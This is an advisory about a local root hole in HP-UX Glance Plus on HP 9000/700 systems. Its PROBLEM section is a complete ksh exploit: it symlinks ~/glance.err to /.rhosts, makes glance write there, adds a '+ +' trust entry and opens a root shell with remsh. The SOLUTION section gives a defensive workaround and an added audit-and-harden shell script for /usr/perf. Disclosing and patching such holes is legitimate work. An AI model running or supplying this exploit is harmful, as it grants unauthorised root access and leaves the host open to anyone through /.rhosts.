COMMAND

    /usr/perf/bin/glance

SYSTEMS AFFECTED

    HP 9000/700

PROBLEM

    Here's the exploit code:

    #!/bin/ksh
    # exploit to work against the latest rev that I know of for glance+
    # Tested on 9000/700.. Don't even know if it's available on 10.X

    if [ ! -x /usr/perf/bin/glance ]
    then
      echo 'No diablo programme.'
      echo 'Que si como es que.'
      exit
    fi

    PATH=/usr/perf/bin:/bin:/usr/bin:$PATH
    echo 'Please wait for about 10 seconds, or somewhere around that, anyway.'
    sleep 3
    cp /.rhosts /tmp/rhosts-save
    ln -s /.rhosts ~/glance.err
    glance -j 1 -f ';><:/?*&^${KILLME}' -iterations 1 -maxpages 1
    echo '+ +' > /.rhosts
    if [ -f /tmp/rhosts-save ]
    then
      cat /tmp/rhosts-save >> /.rhosts
      rm /tmp/rhosts-save
    fi
    #rm ~/glance.err # This goes away?  Why does this go away?
    chmod 666 /.rhosts
    chown root /.rhosts
    remsh localhost -l root /bin/ksh -i

SOLUTION

    Glance Plus is a performance monitor that is included in most
    HP-UX system installations as a demo package or can be purchased
    separately. If you do not need to do system performance
    monitoring, you should remove this whole package, which includes
    all the files in /usr/perf. An earlier problem with Glance was
    covered in the HP Security Advisory 9405-011, which describes a
    patch that updates Glance to version B.09.01 (700-800) or A.09.07
    (300, 400). The current vulnerability is not fixed by these
    updates. If you need to keep this package, you should change the
    permissions of all the files in /usr/perf to owner-only access
    and clear the suid bit. Check that the files are owned by root.
    Normal users will no longer be able to use this program, but the
    system manager will be able to do so when logged in as root.
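
    The workaround above as a script, added here as an example and not
    part of the original advisory. The function names audit_perf_tree and
    harden_perf_tree are hypothetical, and a POSIX find, sed and chmod are
    assumed.

```shell
#!/bin/sh
# Added example: audit and apply the /usr/perf workaround described above.
# Function names are hypothetical; only POSIX find, sed and chmod are used.

# audit_perf_tree [DIR] [OWNER]
# Prints one finding per line; prints nothing when the tree is compliant.
#   SETID  <path>  regular file with the set-uid or set-gid bit
#   ACCESS <path>  any permission bit granted to group or other
#   OWNER  <path>  not owned by OWNER (default root)
audit_perf_tree() {
    dir=${1:-/usr/perf}
    owner=${2:-root}
    find "$dir" -type f \( -perm -4000 -o -perm -2000 \) -print |
        sed 's/^/SETID /'
    find "$dir" ! -type l \( -perm -040 -o -perm -020 -o -perm -010 \
        -o -perm -004 -o -perm -002 -o -perm -001 \) -print |
        sed 's/^/ACCESS /'
    find "$dir" ! -type l ! -user "$owner" -print |
        sed 's/^/OWNER /'
}

# harden_perf_tree [DIR]
# Clears set-id bits and all group/other access. Symbolic links are skipped
# so that chmod is never applied through a link found inside the tree.
harden_perf_tree() {
    dir=${1:-/usr/perf}
    find "$dir" ! -type l -exec chmod u-s,g-s,go-rwx {} +
}

# Typical use, as root:
#   audit_perf_tree            # review the findings first
#   harden_perf_tree && audit_perf_tree
```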